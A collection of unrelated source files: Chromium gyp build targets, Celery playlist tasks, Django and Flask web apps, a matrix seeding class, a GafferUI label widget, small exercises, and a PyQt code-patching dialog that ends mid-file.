'../third_party/icu/icu.gyp:*',
'../third_party/libpng/libpng.gyp:*',
'../third_party/libwebp/libwebp.gyp:*',
'../third_party/libxslt/libxslt.gyp:*',
'../third_party/lzma_sdk/lzma_sdk.gyp:*',
'../third_party/modp_b64/modp_b64.gyp:*',
'../third_party/npapi/npapi.gyp:*',
'../third_party/qcms/qcms.gyp:*',
'../third_party/sqlite/sqlite.gyp:*',
'../third_party/zlib/zlib.gyp:*',
'../ui/ui.gyp:*',
'../webkit/support/webkit_support.gyp:*',
'../webkit/webkit.gyp:*',
'../build/temp_gyp/googleurl.gyp:*',
'../breakpad/breakpad.gyp:*',
'../courgette/courgette.gyp:*',
'../rlz/rlz.gyp:*',
'../sandbox/sandbox.gyp:*',
'../tools/memory_watcher/memory_watcher.gyp:*',
'../v8/tools/gyp/v8.gyp:v8_shell',
'<(libjpeg_gyp_path):*',
],
'conditions': [
['win_use_allocator_shim==1', {
'dependencies': [
'../base/allocator/allocator.gyp:*',
],
}],
],
},
{
'target_name': 'chrome_dll_version',
'type': 'none',
#'msvs_guid': '414D4D24-5D65-498B-A33F-3A29AD3CDEDC',
'dependencies': [
'../build/util/build_util.gyp:lastchange',
],
'direct_dependent_settings': {
'include_dirs': [
'<(SHARED_INTERMEDIATE_DIR)/chrome_dll_version',
],
},
'actions': [
{
'action_name': 'version',
'variables': {
'lastchange_path':
'<(SHARED_INTERMEDIATE_DIR)/build/LASTCHANGE',
'template_input_path': 'app/chrome_dll_version.rc.version',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_path': 'app/theme/google_chrome/BRANDING',
},
}, { # else branding!="Chrome"
'variables': {
'branding_path': 'app/theme/chromium/BRANDING',
},
}],
],
'inputs': [
'<(template_input_path)',
'<(version_path)',
'<(branding_path)',
'<(lastchange_path)',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/chrome_dll_version/chrome_dll_version.rc',
],
'action': [
'python',
'<(version_py_path)',
'-f', '<(version_path)',
'-f', '<(branding_path)',
'-f', '<(lastchange_path)',
'<(template_input_path)',
'<@(_outputs)',
],
'message': 'Generating version information in <(_outputs)'
},
],
},
{
'target_name': 'chrome_version_header',
'type': 'none',
'hard_dependency': 1,
'dependencies': [
'../build/util/build_util.gyp:lastchange',
],
'actions': [
{
'action_name': 'version_header',
'variables': {
'lastchange_path':
'<(SHARED_INTERMEDIATE_DIR)/build/LASTCHANGE',
},
'conditions': [
[ 'branding == "Chrome"', {
'variables': {
'branding_path': 'app/theme/google_chrome/BRANDING',
},
}, { # else branding!="Chrome"
'variables': {
'branding_path': 'app/theme/chromium/BRANDING',
},
}],
],
'inputs': [
'<(version_path)',
'<(branding_path)',
'<(lastchange_path)',
'version.h.in',
],
'outputs': [
'<(SHARED_INTERMEDIATE_DIR)/version.h',
],
'action': [
'python',
'<(version_py_path)',
'-f', '<(version_path)',
'-f', '<(branding_path)',
'-f', '<(lastchange_path)',
'version.h.in',
'<@(_outputs)',
],
'message': 'Generating version header file: <@(_outputs)',
},
],
},
{
'target_name': 'automation',
'type': '<(library)',
'msvs_guid': '1556EF78-C7E6-43C8-951F-F6B43AC0DD12',
'dependencies': [
'theme_resources',
'../base/base.gyp:test_support_base',
'../skia/skia.gyp:skia',
'../testing/gtest.gyp:gtest',
],
'include_dirs': [
'..',
],
'sources': [
'test/automation/autocomplete_edit_proxy.cc',
'test/automation/autocomplete_edit_proxy.h',
'test/automation/automation_handle_tracker.cc',
'test/automation/automation_handle_tracker.h',
'test/automation/automation_json_requests.cc',
'test/automation/automation_json_requests.h',
'test/automation/automation_proxy.cc',
'test/automation/automation_proxy.h',
'test/automation/browser_proxy.cc',
'test/automation/browser_proxy.h',
'test/automation/dom_element_proxy.cc',
'test/automation/dom_element_proxy.h',
'test/automation/extension_proxy.cc',
'test/automation/extension_proxy.h',
'test/automation/javascript_execution_controller.cc',
'test/automation/javascript_execution_controller.h',
'test/automation/tab_proxy.cc',
'test/automation/tab_proxy.h',
'test/automation/window_proxy.cc',
'test/automation/window_proxy.h',
],
},
{
'target_name': 'crash_service',
'type': 'executable',
'msvs_guid': '89C1C190-A5D1-4EC4-BD6A-67FF2195C7CC',
'dependencies': [
'app/policy/cloud_policy_codegen.gyp:policy',
'common_constants',
'installer_util',
'../base/base.gyp:base',
'../breakpad/breakpad.gyp:breakpad_handler',
'../breakpad/breakpad.gyp:breakpad_sender',
],
'include_dirs': [
'..',
],
'sources': [
'tools/crash_service/crash_service.cc',
'tools/crash_service/crash_service.h',
'tools/crash_service/main.cc',
],
'msvs_settings': {
'VCLinkerTool': {
'SubSystem': '2', # Set /SUBSYSTEM:WINDOWS
},
},
},
]}, # 'targets'
], # OS=="win"
['OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"', {
'targets': [{
'target_name': 'packed_resources',
'type': 'none',
'variables': {
'repack_path': '../tools/data_pack/repack.py',
},
'actions': [
# TODO(mark): These actions are duplicated for the Mac in the
# chrome_dll target. Can they be unified?
#
# Mac needs 'process_outputs_as_mac_bundle_resources' to be set,
# and the option is only effective when the target type is native
# binary. Hence we cannot build the Mac bundle resources here.
{
'action_name': 'repack_chrome',
'variables': {
'pak_inputs': [
'<(grit_out_dir)/autofill_resources.pak',
'<(grit_out_dir)/browser_resources.pak',
'<(grit_out_dir)/common_resources.pak',
'<(grit_out_dir)/default_plugin_resources/default_plugin_resources.pak',
'<(grit_out_dir)/renderer_resources.pak',
'<(grit_out_dir)/theme_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/app/app_resources/app_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/ui/gfx/gfx_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/net/net_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/webkit/webkit_chromium_resources.pak',
'<(SHARED_INTERMEDIATE_DIR)/webkit/webkit_resources.pak',
],
},
'inputs': [
'<(repack_path)',
'<@(pak_inputs)',
],
'outputs': [
'<(INTERMEDIATE_DIR)/repack/chrome.pak',
],
'action': ['python', '<(repack_path)', '<@(_outputs)',
'<@(pak_inputs)'],
},
{
'action_name': 'repack_locales',
'variables': {
'conditions': [
['branding=="Chrome"', {
'branding_flag': ['-b', 'google_chrome',],
}, { # else: branding!="Chrome"
'branding_flag': ['-b', 'chromium',],
}],
],
},
'inputs': [
'tools/build/repack_locales.py',
# NOTE: Ideally the common command args would be shared amongst
# inputs/outputs/action, but the args include shell variables
# which need to be passed intact, and command expansion wants
# to expand the shell variables. Adding the explicit quoting
# here was the only way it seemed to work.
'>!@(<(repack_locales_cmd) -i <(branding_flag) -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
'outputs': [
'>!@(<(repack_locales_cmd) -o -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
'action': [
'<@(repack_locales_cmd)',
'<@(branding_flag)',
'-g', '<(grit_out_dir)',
'-s', '<(SHARED_INTERMEDIATE_DIR)',
'-x', '<(INTERMEDIATE_DIR)',
'<@(locales)',
],
},
],
# We'll install the resource files to the product directory.
'copies': [
{
'destination': '<(PRODUCT_DIR)/locales',
'files': [
'>!@(<(repack_locales_cmd) -o -g \'<(grit_out_dir)\' -s \'<(SHARED_INTERMEDIATE_DIR)\' -x \'<(INTERMEDIATE_DIR)\' <(locales))',
],
},
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(INTERMEDIATE_DIR)/repack/chrome.pak'
],
},
],
}], # targets
}], # OS=="linux" or OS=="freebsd" or OS=="openbsd" or OS=="solaris"
], # 'conditions'
}
# Local Variables:
# tab-width:2
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=2 shiftwidth=2:
|
# we are trying to get an input from the user - we need the number of month and it has to be an integer
def my_input(prompt=''):
try:
return input(prompt)
except NameError:
return input(prompt)
def time_frame():
try: # this is going to ask for the months to be inputted - but we will convert it to integer immediately
user_month_input = int(my_input("How long would you like to run the simulation for? Enter in number (1, 2,.. etc) of month: "))
except ValueError: # we know people do not do as asked so this deals with error incase an integer is not input
print("Please input month number as month digit (eg. 10)")
user_month_input = int(
my_input("How long would you like to run the stimulation for? Enter in number (1, 2,.. etc) of month: "))
return user_month_input # this just gives us the months as an integer that we can then use for the rest of our work
# months = time_frame()
|
import copy
import celery
from src.constants import Platform
from src.models import Playlist
from src.message_formatters import SlackMessageFormatter
from src.music_services import TrackInfo
from src.utils import (
add_track_to_playlists,
fuzzy_search_from_string,
fuzzy_search_from_track_info,
get_track_info_from_link
)
app = celery.Celery('tasks', broker="redis://redisbroker:6379/0")
@app.task
def search_and_add_to_playlists(origin, platform, channel):
"""
1. Search for track info based on target
2. add to same platform playlists
"""
platform = Platform.from_string(platform)
playlists = Playlist.query.filter_by(channel_id=channel, platform=platform).all()
if not playlists:
return True
# see if we were passed a TrackInfo.__dict__
if 'platform' in origin:
origin = TrackInfo(**origin)
if isinstance(origin, TrackInfo):
best_match = fuzzy_search_from_track_info(track_info=origin)
else:
best_match = fuzzy_search_from_string(
track_name=origin.get('track_name'),
artist=origin.get('artist'),
platform=platform
)
if not best_match:
msg_payload = SlackMessageFormatter.format_failed_search_results_message(
origin=origin,
target_platform=platform
)
msg_payload.update({'channel': channel})
SlackMessageFormatter.post_message(payload=msg_payload)
return True
successes, failures = add_track_to_playlists(
track_info=best_match,
playlists=playlists
)
# send message
payload = SlackMessageFormatter.format_add_track_results_message(
origin=origin,
track_info=best_match,
successes=successes,
failures=failures
)
payload.update({'channel': channel})
SlackMessageFormatter.post_message(payload=payload)
return True
@app.task
def add_manual_track_to_playlists(track_name, artist, channel):
origin = {'track_name': track_name, 'artist': artist}
search_and_add_to_playlists.delay(
origin=origin,
platform=Platform.YOUTUBE.name,
channel=channel
)
search_and_add_to_playlists.delay(
origin=origin,
platform=Platform.SPOTIFY.name,
channel=channel
)
return True
@app.task
def add_link_to_playlists(link, channel):
"""
Takes a given link and a list of playlists and:
1. Gets the TrackInfo from the platform the link was shared from
2. Schedules an attempt to add TrackInfo to other platform playlistss
3. Adds the track to all Playlists of the same platform
"""
link_platform = Platform.from_link(link)
# Get TrackInfo from native platform
track_info = get_track_info_from_link(link=link)
if not track_info:
# There's something wrong with the link
msg_payload = SlackMessageFormatter.format_failed_search_results_message(
origin=link,
target_platform=link_platform
)
msg_payload.update({'channel': channel})
SlackMessageFormatter.post_message(payload=msg_payload)
return True
# celery needs json-able objects
track_info_json = copy.deepcopy(track_info.__dict__)
track_info_json['platform'] = track_info.platform.name
# Schedule cross-platform playlists
search_and_add_to_playlists.delay(
origin=track_info_json,
platform=(
Platform.SPOTIFY.name
if link_platform is Platform.YOUTUBE
else Platform.YOUTUBE.name
),
channel=channel
)
playlists = Playlist.query.filter_by(channel_id=channel, platform=link_platform).all()
if not playlists:
return True
if playlists:
successes, failures = add_track_to_playlists(
track_info=track_info,
playlists=playlists
)
# send message
payload = SlackMessageFormatter.format_add_track_results_message(
origin=link,
track_info=track_info,
successes=successes,
failures=failures
)
payload.update({'channel': channel})
SlackMessageFormatter.post_message(payload=payload)
return True
|
from django import forms
from django.db.models import fields
from .models import Participant
# model form
# class RegistrationForm(forms.ModelForm):
# class Meta:
# model=Participant
# fields=['email']
# form object
class RegistrationForm(forms.Form):
email=forms.EmailField(label='your email') |
"""
###################################
Random (``methods.seeding.random``)
###################################
Random is the simplest MF initialization method.
The entries of factors are drawn from a uniform distribution over
[0, max(target matrix)). Generated matrix factors are sparse matrices with the
default density parameter of 0.01.
"""
from nimfa.utils.linalg import *
__all__ = ['Random']
class Random(object):
def __init__(self):
self.name = "random"
def initialize(self, V, rank, options, random_state=None):
"""
Return initialized basis and mixture matrix (and additional factors if
specified in :param:`Sn`, n = 1, 2, ..., k).
Initialized matrices are of the same type as passed target matrix.
:param V: Target matrix, the matrix for MF method to estimate.
:type V: One of the :class:`scipy.sparse` sparse matrices types or
:class:`numpy.matrix`
:param rank: Factorization rank.
:type rank: `int`
:param options: Specify the algorithm and model specific options (e.g. initialization of
extra matrix factor, seeding parameters).
Option ``Sn``, n = 1, 2, 3, ..., k specifies additional k matrix factors which
need to be initialized. The value of each option Sn is a tuple denoting matrix
shape. Matrix factors are returned in the same order as their descriptions in input.
Option ``density`` represents density of generated matrices. Density of 1 means a
full matrix, density of 0 means a matrix with no nonzero items. Default value is 0.7.
Density parameter is applied only if passed target ``V`` is an instance of one :class:`scipy.sparse` sparse types.
:type options: `dict`
:param random_state: The random state to pass to np.random.RandomState()
:type random_state: `int`
"""
self.rank = rank
self.density = options.get('density', 0.7)
if sp.isspmatrix(V):
self.max = V.data.max()
self._format = V.getformat()
gen = self.gen_sparse
else:
self.max = V.max()
self.prng = np.random.RandomState(random_state)
gen = self.gen_dense
self.W = gen(V.shape[0], self.rank)
self.H = gen(self.rank, V.shape[1])
mfs = [self.W, self.H]
for sn in options:
if sn[0] is 'S' and sn[1:].isdigit():
mfs.append(gen(options[sn][0], options[sn][1]))
return mfs
def gen_sparse(self, dim1, dim2):
"""
Return randomly initialized sparse matrix of specified dimensions.
:param dim1: Dimension along first axis.
:type dim1: `int`
:param dim2: Dimension along second axis.
:type dim2: `int`
"""
rnd = sp.rand(dim1, dim2, density=self.density, format=self._format)
return abs(self.max * rnd)
def gen_dense(self, dim1, dim2):
"""
Return randomly initialized :class:`numpy.matrix` matrix of specified
dimensions.
:param dim1: Dimension along first axis.
:type dim1: `int`
:param dim2: Dimension along second axis.
:type dim2: `int`
"""
return np.mat(self.prng.uniform(0, self.max, (dim1, dim2)))
def __repr__(self):
return "random.Random()"
def __str__(self):
return self.name
|
# O(n) time | O(1) space
def maxSubsetSumNoAdjacent(array):
if not len(array):
return
elif len(array) == 1:
return array[0]
second = array[0]
first = max(array[0], array[1])
for i in range(2, len(array)):
current = max(first, second + array[i])
second = first
first = current
return first
print(maxSubsetSumNoAdjacent([75, 105, 120, 75, 90, 135])) |
from rest_framework.response import Response
from rest_framework.views import APIView
from store.api.serializers import ProductSerializer, CategorySerializer
from store.models import Product, Category
class ProductList(APIView):
def get_products(self):
return Product.objects.filter(in_stock=True)
def get(self, request):
products = self.get_products()
serializer = ProductSerializer(products, many=True)
return Response(serializer.data)
class CategoryList(APIView):
def getCategory(self):
return Category.objects.all()
def get(self, request):
categories = self.getCategory()
serializer = CategorySerializer(categories, many=True)
return Response(serializer.data)
|
"""
Title: Prosfora : Social Media for Artists
Author: Gagan Deep Singh, Mayank Setia, Ritik Bhatnagar
Languages: Python, HTML, CSS, JavaScript, jQuery
"""
from flask import (Flask, render_template,
jsonify, request,
redirect, flash, send_file)
from flask_bootstrap import Bootstrap
from flask_moment import Moment
from flask_paranoid import Paranoid
from forms import (Login, Register, PictureUpload,
AudioUpload, VideoUpload, AccountUpdation)
from customValidators import checkForJunk
from models.user import User
from models.post import Post
from models.database import Database
from MongoLogin import *
from uuid import uuid4
from flask_login import (login_user, current_user,
logout_user, LoginManager,
login_required)
from io import BytesIO
app = Flask(__name__)
app.config['SECRET_KEY'] = str(uuid4())
# INIT DATABASE
Database.initialize('Prosfora')
# INIT Login Manager
login_manager = LoginManager()
# for debug
DEBUG = True
@login_manager.user_loader
def load_user(userID):
userObj = User.findUser(userID=userID)
print("[FLASK-LOGIN] \nload_user()-> userID = ", userID)
if not userObj:
return None
return User.toClass(userObj)
login_manager.init_app(app)
login_manager.session_protection = "strong"
login_manager.login_view = 'login'
login_manager.login_message_category = "info"
bootstrap = Bootstrap(app)
moment = Moment(app)
paranoid = Paranoid(app)
paranoid.redirect_view = '/'
##################################################
# Assigning Methods to class
# [Explicitly]
##################################################
User.is_active = is_active
User.is_authenticated = is_authenticated
User.is_anonymous = is_anonymous
User.get_id = get_id
User.load_user = classmethod(load_user)
##################################################
##################################################
# ROUTES
##################################################
##################################################
@app.route('/')
def index():
posts = []
if current_user.is_authenticated:
posts = User.newsfeed(current_user.userID)
return render_template('index.html', posts = posts, findUser = User.findUser)
@app.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect('/', 302)
form = Register()
if request.method == 'POST':
if form.validate_on_submit():
user = User(
name=form.name.data.title(),
userID=str(uuid4())[::-1],
username=form.username.data.lower(),
password=form.password.data,
email=form.email.data.lower(),
gender=form.gender.data
)
user.saveUser()
login_user(user)
return redirect('/', 302)
return render_template('register.html', form=form)
@app.route('/<string:username>/posts/<string:postID>')
def posts(username, postID):
user = User.findUser(username=username)
if not user:
user = User.findUser(userID=username)
if not user:
return redirect('/'), 404, {'Refresh': '1; url = /'}
post = Post.getPostByPostID(postID)
if post:
un = uuid4().int % 1000000
print('un =>', un)
post = Post.to_Class(post)
post.id = un
userInfo = User.toClass(User.findUser(userID=post.userID))
return render_template('post.html',
post=post,
userInfo=userInfo)
return {'error': 'Post Not Found!'}
@app.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect('/', 302)
form = Login()
if request.method == 'POST':
result = form.validate()
if result:
login_user(
User(
_id=result.get('_id'),
name=result.get('name'),
userID=result.get('userID'),
username=result.get('username'),
email=result.get('email'),
gender=result.get('gender')
))
return redirect('/', 302)
return render_template('login.html', form=form)
@app.route('/profile')
@app.route('/profile/<string:username>', methods=['GET', 'POST'])
def profile(username=None):
userInfo = {}
if username and not checkForJunk(
usrtext=username) and not (len(username) > 20):
userInfo = User.findUser(username=username)
if userInfo:
userInfo = User.toClass(userInfo)
user = User.findUser(username=username)
# print('profilePicture: ',userInfo.profilePicture)
if request.method == "POST":
if current_user.is_authenticated:
cuser = User.findUser(userID=current_user.userID)
if request.form.get('follow'):
User.follow(cuser, user)
print('about to start following..')
elif request.form.get('unfollow'):
User.follow(cuser, user, unfollow=True)
print('about to start unfollowing..')
return redirect(f'/profile/{username}')
else:
print('user is not authenticated')
posts = Post.getPostsByUserID(userID=user.get('userID'), all=True)
return render_template('profile.html', userInfo=userInfo, posts=posts)
else:
return redirect('/'), 404, {'Refresh': '1; url = /'}
elif username is None and current_user.is_authenticated:
return redirect(f'/profile/{current_user.username}')
else:
return redirect('/'), 404, {'Refresh': '1; url = /'}
@app.route("/upload", methods=['GET', 'POST'])
@app.route("/upload/picture", methods=['GET', 'POST'])
@app.route("/upload/video", methods=['GET', 'POST'])
@app.route("/upload/audio", methods=['GET', 'POST'])
@login_required
def uploadContent():
urls = {
"/upload": ["upload.html", None],
"/upload/picture": ["upload_picture.html", PictureUpload, 'Picture'],
"/upload/video": ["upload_video.html", VideoUpload, 'Video'],
"/upload/audio": ["upload_audio.html", AudioUpload, 'Audio']
}
url = urls.get(request.path)[0]
form = urls.get(request.path)[1]
contentType = urls.get(request.path)[-1]
if form:
form = form()
if request.method == 'GET':
if url:
return render_template(url, form=form)
else:
return redirect('/'), 404, {'Refresh': '1; url = /'}
else:
if form.validate_on_submit():
content = form.file.data.read()
title = form.title.data
description = form.description.data
userID = current_user.userID
postID = uuid4().hex
if contentType == 'Audio':
AlbumArt = form.AlbumArt.data
if AlbumArt:
AlbumArt = AlbumArt.read()
else:
AlbumArt = None
result = User.Post(title=title,
content=content,
contentType=contentType,
userID=userID,
postID=postID,
description=description,
AlbumArt=AlbumArt)
if result:
return redirect(f'/{current_user.username}/posts/{postID}')
else:
return 'Something went wrong..'
else:
# print('validation failed!')
return render_template(url, form=form)
@app.route('/data/<string:postID>.<string:ext>')
@app.route('/data/<string:AlbumArt>/<string:postID>.jpeg')
@app.route('/profile/<string:userID>/<string:profilePic>.jpeg')
@app.route('/profile/<string:userID>/<string:coverPhoto>.jpeg')
def resources(postID=None,
userID=None,
contentID=None,
AlbumArt=None,
profilePic=None,
coverPhoto=None,
ext=None):
if postID != None:
post = Post.getPostByPostID(postID)
if post:
if AlbumArt:
data = post.get('AlbumArt')
print('AlbumArt')
else:
data = post.get('content')
print('MP3')
else:
# flash('Unable to load Resources')
return redirect('/'), 404, {'Refresh': '1; url = /'}
else:
user = User.findUser(userID=userID)
if user:
if profilePic:
print('ProfilePic')
data = user.get('profilePic')
else:
print('coverPhoto')
data = user.get('coverPhoto')
else:
# flash('Unable to load Resources')
return redirect('/'), 404, {'Refresh': '1; url = /'}
data = data.get('file')
mimetype = {
'Audio': 'audio/mpeg',
'Video': 'video/mp4',
'Picture': 'image/jpeg'
}
mimetype = mimetype.get(post.get('contentType'))
print(mimetype)
return send_file(
BytesIO(data),
mimetype=mimetype,
as_attachment=True,
attachment_filename=f"{uuid4().hex}.{ext}")
@app.route('/profile/<string:username>/followers')
@app.route('/profile/<string:username>/following')
@login_required
def followers(username=None):
if not username:
return redirect('/'), 404, {'Refresh': '1; url = /'}
if "followers" in request.path:
followers = User.getFollowers(userID = User.findUser(username=username)['userID'])
else:
followers = User.getFollowers(userID = User.findUser(username=username)['userID'], following=True)
return render_template('followers.html', users = followers)
@app.route('/explore')
def explore():
return render_template('explore.html')
@app.route('/featured')
def featured():
return render_template('featured.html')
@app.route('/about')
def about():
return render_template('about.html')
@app.route('/contact')
def contact():
return render_template('contact.html')
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect('/', 302)
@app.route('/search')
def search():
return render_template('search.html')
@app.route('/settings', methods=['GET', 'POST'])
@login_required
def settings():
form = AccountUpdation()
if request.method == "POST":
if form.validate_on_submit():
data = {}
if form.username.data:
data['username'] = form.username.data
if form.coverphoto.data:
data['coverPhoto'] = form.coverphoto.data
if form.email.data:
data['email'] = form.email.data
if form.picture.data:
data['profilePic'] = form.picture.data.read()
if data:
print("Data received by Settings() :", data)
cu = User.findUser(userID=current_user.userID)
cu.update(data)
User.updateUserInfo(cu)
return render_template('settings.html', form=form)
if __name__ == "__main__":
app.run(debug=DEBUG)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 13. Faça um Programa que leia um número e exiba o dia correspondente da semana. (1 - Domingo, 2 - Segunda, etc.), se digitar outro valor deve aparecer valor inválido.
dias_da_semana = ["Inválido", "Domingo", "Segunda", "Terça", "Quarta", "Quinta", "Sexta", "Sábado"]
print "Informe um número correspondente ao dia da semana. (1-Domingo, 2- Segunda, etc.)"
for i in dias_da_semana:
numero = int(raw_input("Número: "))
if numero >= 1 and numero <= 7: print numero, "-", dias_da_semana[numero]
else: print "O número não corresponde a um dia da semana. Tente novamente."
|
from django.shortcuts import render
from myapp.models import *
# Create your views here.
def index(request):
return render(request, "index.html")
# Display all()
def display(request):
data_topic = Topic.objects.all() # Topic is the Class name / Table name
data_webpage = Webpage.objects.all() # Webpage is the Class name / Webpage name
data_access_details = Access_Details.objects.all() # Access_Details is the Class name / Webpage name
top = {'topics':data_topic, 'webpages':data_webpage, 'access_details':data_access_details}
return render(request, "display.html", context=top)
# Display ascending order
def display_asc(request):
access_details_asc = Access_Details.objects.order_by('date') # order_by() ordered all the data by asc order
access_date = {'dates':access_details_asc}
return render(request, "display_asc.html", context=access_date)
# Display a specific record # using get(key:value)
def display_specific(request):
# webpage_details = Webpage.objects.get(:)
return render(request, "display_specific.html")
# Display the filter data
def filter_data(request):
filterdata = Webpage.objects.filter(top_name = "Music")
return render(request, "filter_data.html", context={'webpage':filterdata})
#startswith , endswith, and contains check
def like_data(request):
return render(request, "like_data.html") |
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferUI
from Qt import QtWidgets
from Qt import QtCore
class Label( GafferUI.Widget ) :
## \todo Remove these and just reference them directly
HorizontalAlignment = GafferUI.HorizontalAlignment
VerticalAlignment = GafferUI.VerticalAlignment
def __init__( self, text="", horizontalAlignment=HorizontalAlignment.Left, verticalAlignment=VerticalAlignment.Center, **kw ) :
GafferUI.Widget.__init__( self, QtWidgets.QLabel( text ), **kw )
# by default the widget would accept both shrinking and growing, but we'd rather it just stubbornly stayed
# the same size. it's particularly important that it doesn't accept growth vertically as then vertical ListContainers
# don't shrink properly when a child is hidden or shrunk - instead the container would distribute the extra height
# among all the labels.
self._qtWidget().setSizePolicy( QtWidgets.QSizePolicy( QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed ) )
self.setAlignment( horizontalAlignment, verticalAlignment )
def setText( self, text ) :
self._qtWidget().setText( text )
def getText( self ) :
return str( self._qtWidget().text() )
def setAlignment( self, horizontalAlignment, verticalAlignment ) :
self._qtWidget().setAlignment(
GafferUI.HorizontalAlignment._toQt( horizontalAlignment ) |
GafferUI.VerticalAlignment._toQt( verticalAlignment )
)
def getAlignment( self ) :
a = self._qtWidget().alignment()
return (
GafferUI.HorizontalAlignment._fromQt( a ),
GafferUI.VerticalAlignment._fromQt( a ),
)
def setTextSelectable( self, selectable ) :
flags = self._qtWidget().textInteractionFlags()
flags &= ~QtCore.Qt.TextSelectableByMouse
if selectable :
flags |= QtCore.Qt.TextSelectableByMouse
self._qtWidget().setTextInteractionFlags( flags )
def getTextSelectable( self ) :
return bool( self._qtWidget().textInteractionFlags() & QtCore.Qt.TextSelectableByMouse )
def linkActivatedSignal( self ) :
try :
return self.__linkActivatedSignal
except :
self.__linkActivatedSignal = GafferUI.WidgetEventSignal()
self._qtWidget().linkActivated.connect( Gaffer.WeakMethod( self.__linkActivated ) )
return self.__linkActivatedSignal
def __linkActivated( self, link ) :
self.__linkActivatedSignal( self, str( link ) )
|
import argparse
import os
import imageio
def main():
parser = argparse.ArgumentParser()
parser.add_argument("folder", help="Pasta com ppms para converter para JPG")
args = parser.parse_args()
# images.append(imageio.imread(filename))
folder = os.path.abspath(args.folder)
onlyfiles = [f for f in os.listdir(folder) if os.path.isfile(os.path.join(folder, f))]
# print(onlyfiles)
out_path = folder + "_png"
if ((not os.path.exists(out_path)) and (len(out_path) >= 1)):
os.makedirs(out_path)
for f in onlyfiles:
path = folder + "/" + f
print(path)
im = imageio.imread(path)
saida = folder + "_png" + "/" + f[0:-4] + ".png"
print(saida)
imageio.imsave(saida, im, "PNG")
if __name__ == "__main__":
main()
|
import os
from PyQt5.QtWidgets import QDialog, QMessageBox
from ui.patch import Ui_PatchDialog
from utils import AsmUtil
class patchForm(QDialog,Ui_PatchDialog):
def __init__(self, parent=None):
super(patchForm, self).__init__(parent)
self.setupUi(self)
self.setWindowOpacity(0.93)
self.btnSubmit.clicked.connect(self.submit)
self.moduleName = ""
self.address=""
self.patch=""
self.btnClear.clicked.connect(self.clearUi)
self.clearUi()
self.flushCmb()
self.listModule.itemClicked.connect(self.ModuleItemClick)
self.txtModule.textChanged.connect(self.changeModule)
self.cmbPackage.currentTextChanged.connect(self.changePackage)
self.modules = None
self.txtPatch.textChanged.connect(self.changePatchCode)
self.txtPatchAsm.textChanged.connect(self.changePatchAsm)
def initData(self):
self.listModule.clear()
for item in self.modules:
self.listModule.addItem(item)
def flushCmb(self):
self.cmbPackage.clear()
files = os.listdir("./tmp/")
self.cmbPackage.addItem("选择缓存数据")
for item in files:
if ".modules.txt" in item:
self.cmbPackage.addItem(item.replace(".modules.txt", ""))
def ModuleItemClick(self, item):
self.txtModule.setText(item.text())
def changeModule(self, data):
if self.modules==None or len(self.modules)<=0:
return
if data=="" or data=="选择缓存数据":
return
self.listModule.clear()
if len(data) > 0:
for item in self.modules:
if data in item:
self.listModule.addItem(item)
else:
for item in self.modules:
self.listModule.addItem(item)
def changePackage(self, data):
if data=="" or data=="选择缓存数据":
return
filepath = "./tmp/" + data + ".modules.txt"
with open(filepath, "r", encoding="utf-8") as packageFile:
res = packageFile.read()
self.modules = res.split("\n")
self.initData()
def changePatchCode(self,data):
try:
codebuff=AsmUtil.StrToHexSplit(data)
res=AsmUtil.disasm(self.cmbMode.currentIndex(),codebuff)
self.txtPatchAsm.textChanged.disconnect(self.changePatchAsm)
self.txtPatchAsm.setText(res)
self.txtPatchAsm.textChanged.connect(self.changePatchAsm)
except:
pass
def changePatchAsm(self,data):
try:
res= AsmUtil.asm(self.cmbMode.currentIndex(),data)
self.txtPatch.textChanged.disconnect(self.changePatchCode)
self.txtPatch.setText(res)
self.txtPatch.textChanged.connect(self.changePatchCode)
except:
pass
def clearUi(self):
self.txtModule.setText("")
self.txtAddress.setText("")
self.txtPatch.setText("")
def submit(self):
